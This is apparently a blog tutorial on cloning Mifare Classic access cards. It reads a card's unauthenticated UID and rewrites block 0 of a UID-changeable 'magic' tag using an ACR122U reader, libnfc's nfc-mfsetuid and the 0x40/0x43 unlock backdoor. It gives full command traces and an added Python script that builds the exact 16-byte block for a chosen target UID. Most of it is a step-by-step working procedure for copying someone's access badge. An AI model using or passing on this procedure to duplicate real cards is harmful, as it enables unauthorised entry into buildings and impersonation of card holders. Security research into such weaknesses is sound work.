I observed that most Mifare Classic-based access cards use only the first 4 bytes (the UID) to identify the card holder. The UID is sent in the clear during anticollision and is never authenticated, so it can be read with an Android phone and, for example, the “NFC TagInfo” app. Cloning can then be done with an ACR122U and “chinese clone tags” (usually sold as magic or UID-changeable tags). These tags are special: on a genuine Mifare Classic the manufacturer block (block 0, which holds the UID) is locked at the factory and read-only, whereas the clone tags accept a vendor backdoor sequence (the 7-bit 0x40 command followed by 0x43, visible in the trace below) that unlocks block 0 for writing without any key. On Linux the UID can be changed with libnfc’s nfc-mfsetuid. Note that block 0 is more than the UID: it also carries the BCC (XOR of the 4 UID bytes), the SAK, the ATQA and 8 bytes of manufacturer data, and nfc-mfsetuid rewrites the whole 16-byte block with a BCC that matches the new UID. A block 0 with a wrong BCC leaves the tag unable to complete anticollision, so the consistency of those bytes is worth checking before writing. The output may look like this (changing the UID from 01234567 to da08738d):
Check tag ID:
root@laptop:~/rfid# nfc-anticol
NFC reader: ACS / ACR122U PICC Interface opened
Sent bits: 26 (7 bits)
Received bits: 04 00
Sent bits: 93 20
Received bits: 01 23 45 67 00
Sent bits: 93 70 01 23 45 67 00 d0 6f
Received bits: 08 b6 dd
Sent bits: 50 00 57 cd
Found tag with
UID: 01234567
ATQA: 0004
SAK: 08
Change ID to da08738d:
root@laptop:~/rfid# nfc-mfsetuid da08738d
NFC reader: ACS / ACR122U PICC Interface opened
Sent bits: 26 (7 bits)
Received bits: 04 00
Sent bits: 93 20
Received bits: 01 23 45 67 00
Sent bits: 93 70 01 23 45 67 00 d0 6f
Received bits: 08 b6 dd
Found tag with
UID: 01234567
ATQA: 0004
SAK: 08
Sent bits: 50 00 57 cd
Sent bits: 40 (7 bits)
Received bits: a (4 bits)
Sent bits: 43
Received bits: 0a
Sent bits: a0 00 5f b1
Received bits: 0a
Sent bits: da 08 73 8d 2c 08 04 00 46 59 25 58 49 10 23 02 c2 99
Received bits: 0a
Check if write was successful:
root@laptop:~/rfid# nfc-anticol
NFC reader: ACS / ACR122U PICC Interface opened
Sent bits: 26 (7 bits)
Received bits: 04 00
Sent bits: 93 20
Received bits: da 08 73 8d 2c
Sent bits: 93 70 da 08 73 8d 2c bd 37
Received bits: 08 b6 dd
Sent bits: 50 00 57 cd
Found tag with
UID: da08738d
ATQA: 0004
SAK: 08
root@laptop:~/rfid#
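The frames in the trace above can be checked offline before a block 0 is written to a magic tag. The following Python is an added example, not code from the original post and not part of libnfc: it implements the ISO/IEC 14443-3 CRC_A (the same preset 0x6363 routine libnfc appends to every frame), the BCC check on the anticollision response, and the assembly of the 16-byte manufacturer block in the layout nfc-mfsetuid writes (UID, BCC, SAK, ATQA in over-the-air byte order, 8 manufacturer bytes). The function names are ours; the sample frames are constructed input copied from the trace on this page, and verifying them shows the CRC trailers (d0 6f, 57 cd, 5f b1, c2 99, bd 37) and the BCCs 00 and 2c are exactly what the algorithm predicts.

```python
"""Offline sanity checks for a Mifare Classic UID (block 0) rewrite.

Added example built around the nfc-anticol / nfc-mfsetuid trace above; it is
not part of libnfc or the original post. Frame data is copied from the page.
"""


def iso14443a_crc(data: bytes) -> bytes:
    """CRC_A from ISO/IEC 14443-3 (preset 0x6363, no final XOR), the routine
    libnfc uses to append frame CRCs. Returns the two trailer bytes in
    over-the-air order (low byte first)."""
    crc = 0x6363
    for b in data:
        ch = b ^ (crc & 0xFF)
        ch = (ch ^ (ch << 4)) & 0xFF
        crc = ((crc >> 8) ^ (ch << 8) ^ (ch << 3) ^ (ch >> 4)) & 0xFFFF
    return bytes((crc & 0xFF, crc >> 8))


def frame_crc_ok(frame: bytes) -> bool:
    """True if the last two bytes of a captured frame are a valid CRC_A
    over everything before them."""
    return len(frame) > 2 and iso14443a_crc(frame[:-2]) == frame[-2:]


def bcc(uid: bytes) -> int:
    """Block Check Character: XOR of the four UID bytes. The anticollision
    response in the trace is UID0..3 followed by this byte."""
    if len(uid) != 4:
        raise ValueError("expected a 4-byte UID")
    return uid[0] ^ uid[1] ^ uid[2] ^ uid[3]


def build_block0(uid: bytes, sak: int = 0x08, atqa: bytes = b"\x04\x00",
                 manufacturer: bytes = bytes(8)) -> bytes:
    """Assemble the 16-byte manufacturer block of a 4-byte-UID Mifare Classic:
    UID(4) | BCC(1) | SAK(1) | ATQA(2, over-the-air order) | 8 vendor bytes.
    This is the payload written after the 0x40/0x43 backdoor unlock.
    Defaults (SAK 08, ATQA 04 00) are the values shown in the trace."""
    if len(atqa) != 2 or len(manufacturer) != 8:
        raise ValueError("ATQA must be 2 bytes and manufacturer data 8 bytes")
    return uid + bytes([bcc(uid), sak]) + atqa + manufacturer


def block0_consistent(block: bytes) -> bool:
    """Refuse a block whose BCC does not match its UID; a tag written with a
    bad BCC fails anticollision and is no longer selectable."""
    return len(block) == 16 and block[4] == bcc(block[:4])


# Constructed input: frames copied from the trace above (data + CRC_A).
TRACE = {
    "select_old": bytes.fromhex("93 70 01 23 45 67 00 d0 6f"),
    "sak":        bytes.fromhex("08 b6 dd"),
    "halt":       bytes.fromhex("50 00 57 cd"),
    "write_blk0": bytes.fromhex("a0 00 5f b1"),
    "blk0_data":  bytes.fromhex("da 08 73 8d 2c 08 04 00 46 59 25 58 49 10 23 02 c2 99"),
    "select_new": bytes.fromhex("93 70 da 08 73 8d 2c bd 37"),
}


def verify_trace(trace: dict) -> dict:
    """Map each captured frame name to whether its CRC_A trailer is valid."""
    return {name: frame_crc_ok(frame) for name, frame in trace.items()}


if __name__ == "__main__":
    for name, ok in verify_trace(TRACE).items():
        print(f"{name:11s} CRC_A {'ok' if ok else 'BAD'}")
    new_uid = bytes.fromhex("da08738d")
    block = build_block0(new_uid, manufacturer=bytes.fromhex("4659255849102302"))
    print("block 0 to write :", block.hex(" "))
    print("equals trace data:", block == TRACE["blk0_data"][:16])
    print("BCC consistent   :", block0_consistent(block))
```

Run it as a script to see every frame from the trace verify; swap in your own target UID and the manufacturer bytes read from the tag to get the exact 16 bytes nfc-mfsetuid will send, and keep the BCC check in front of any write to a magic tag.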